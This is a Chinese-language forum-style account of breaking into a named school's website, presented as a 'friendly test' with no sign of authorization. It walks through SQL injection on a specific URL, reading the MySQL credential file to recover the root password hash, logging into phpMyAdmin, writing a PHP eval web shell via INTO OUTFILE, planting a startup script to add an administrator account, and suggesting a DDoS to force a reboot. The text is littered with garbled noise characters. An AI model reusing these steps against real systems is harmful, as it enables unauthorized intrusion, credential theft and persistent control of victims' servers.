友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
$ C: e, f" k, ]8 F# K% O发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
) s* p3 s. H7 S$ U
5 s" R* q, w2 L5 E
2 o6 _9 r/ b6 w" h0 C# Q
1 \. g0 L+ ^# U9 l& n8 F常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
4 e0 g1 Q1 k) |  m+ K7 n* I
* y# L% \7 u5 W8 Y" W8 N- M9 v那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
" I2 w" u; C$ ~5 _. Z( v1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
" k! @9 K6 R' b- F5./phpmyadmin/libraries/select_lang.lib.php  
3 M/ \6 }6 Y5 C1 G+ G7 z2 s6./phpmyadmin/libraries/lect_lang.lib.php  
7 a$ k3 f; g7 p' H7 B% \7./phpmyadmin/libraries/mcrypt.lib.php   
8 C( e- z) N1 B1 V+ j2 T8./phpmyadmin/libraries/export/xls.php  
( ~) Y5 ~5 I7 f1 j) w. f
/ l" ?8 X: ?7 E3 q9 L" f6 x均不行...........................
3 {, a& I2 @4 X6 A# [- E
8 J+ e, Y7 J: R9 |1 b御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
: r$ {7 g4 C! D+ K* W, Z8 Z
. f: A' W) t5 z权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
+ H- Y$ h/ Y1 N9 Z
4 n2 n9 I  b# A* p) T默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
% r4 l; n! k/ Y, m
& W" c  L) b9 F9 j2 W  A/ b敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
/ K4 S5 z3 W3 S+ _% H
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
' [" m; g& y' O' Z) {
( M# m5 U, a; |- m+ W: ohttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
8 _* m, k# }: G
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
7 h8 {+ f" g% d5 O
成功读到root密码：
) E* q7 ~  {3 f9 Q& s8 A
) }) Z) G4 |' K- [% w17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
" f1 r- j0 M9 e3 p9 G$ d23---- 2(0032)
9 p0 j- w& n/ W5 u24---- E(0045)
: g3 {) n0 ^! t25---- 1(0031)
26---- C(0043)
7 X' |) d0 u9 S& w27---- 5(0035)
28---- 8(0038)
4 P( q% d( L' ]# M- o29---- 2(0032)
4 c! F2 _& s' U* x+ ?4 J( j& A5 N30---- 8(0038)
31---- A(0041)
32---- 9(0039)
6 r' N/ e4 N$ W$ e33---- B(0042)
34---- 5(0035)
35---- 4(0034)
+ Z4 D5 y# d( r* `* [$ k0 Z( z4 G36---- 8(0038)
+ u8 a  q' }' y6 e" k" k6 x& v+ U37---- 6(0036)
. L) P3 L$ [+ ~1 j$ y38---- 4(0034)
39---- 9(0039)
$ r0 I1 b5 v/ X* x40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
/ Z5 E8 t: e+ b+ Q- ^, b43---- 3(0033)
/ J' g7 c9 X2 c$ ?; b- t% V1 @44---- 5(0035)
45---- 9(0039)
( ~- _% |! d: G) }0 F46---- 8(0038)
2 B1 `0 M% B1 Z4 x) @: ^47---- F(0046)
  h% `1 w4 d% \4 Y48---- F(0046)
0 q# e2 f- a2 S/ B49---- 4(0034)
: X6 y. K# Q" s- V  y$ }50---- F(0046)
51---- 0(0030)
52---- 3(0033)
3 E) p6 r# S6 {53---- 2(0032)
: m, X7 Z& h; r& s54---- A(0041)
55---- 4(0034)
! ?: c6 H4 z6 p# q$ J2 N! w% r56---- A(0041)
) R0 J; @5 M' D8 I1 I3 h% A57---- B(0042)
- l$ n% ]& T/ G# E58---- *(0044)
59---- *(0035)
, d3 a3 _! K8 l5 H$ T2 j6 r3 K60---- *(0041)
61---- *0032)

解密后成功登陆phpmyamin
                          
4 l, B5 K% c6 M0 L( A
8 x" y9 |( U# z1 p2 T9 I6 p/ w; R                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

9 X% I9 n* \! `; e0 K成功执行，拿下shell，菜刀连接：

: ]4 S! V; g3 }服务器不支持asp,aspx,php提权无果...................
. t9 g% K. ~0 D% X+ j  ?
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
' a+ }2 Y' H8 A" c

服务器上已经有个隐藏帐号了

" B+ Y! [. O& i& ]

别名     administrators
5 X8 W& {2 w3 O  |( ?9 N注释     管理员对计算机/域有不受限制的完全访问权

  w: w7 r' H: y' i% V

成员

-------------------------------------------------------------------------------
admin
, ?$ [5 U% _* eAdministrator
8 K9 {, a& i4 \3 nslipper$
' o) W: ]7 `" m' Msqluser
命令成功完成。
: U  ^& Z* W- B
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
3 J2 A3 T9 k6 ?7 f
& t! @1 A: @$ N) P2 {0 Zddos服务器重启，不然就只能坐等服务器重启了...............................
9 W! N0 W" H6 R1 j9 c8 G8 B. a
; b% j  G& E( Y) o3 _/ V& v1 O      

- c1 Q, k' L* z" ^. [4 P

angel